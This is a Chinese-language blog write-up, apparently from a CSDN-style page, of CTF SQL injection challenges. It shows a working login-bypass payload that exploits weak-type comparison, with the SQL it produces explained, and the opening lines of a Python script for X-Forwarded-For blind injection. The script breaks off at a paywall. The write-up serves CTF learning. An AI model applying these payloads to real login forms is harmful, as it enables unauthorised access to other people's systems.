本文介绍了CTF比赛中的多种SQL注入问题,包括登陆页面的SQL注入,利用弱类型比较构造万能密码;xff注入的绕过策略;以及不同类型的SQL注入实战,如使用tamper工具进行空格和关键字的转义。此外,还提到了base64编码的快速转换和编码绕过技术。文章最后提到了一些隐藏参数和源码查看在解决挑战中的作用。
登陆一下好吗
类型:sql注入
已经过滤了/ # -- select or union |等,但是没有过滤单引号
payload:username=pcat'='&password=pcat'='
原sql语句为:
select * from user where username='用户名' and password='密码'拼接后为:
select * from user where username='pcat'='' and password='pcat'=''计算机首先计算username='pcat',返回为0(false),再计算0=”,结果为1
最终语句等同于
select * from user where 1 and 1即
select * from user 关于弱类型的比较:
以下情况都会为true
1=’1’
1=’1.0’
1=’1后接字母(再后面有数字也可以)’
0=’除了非0数字开头的字符串’
(总体上只要前面达成0的话,要使语句为true很简单,所以这题的万能密码只要按照我上面的法子去写一大把)
who are you?
类型:xff注入
# -*- coding: utf-8 -*-
import requests
import time
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'
flag = ''
最低0.47元/天 解锁文章
扫一扫
3360
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
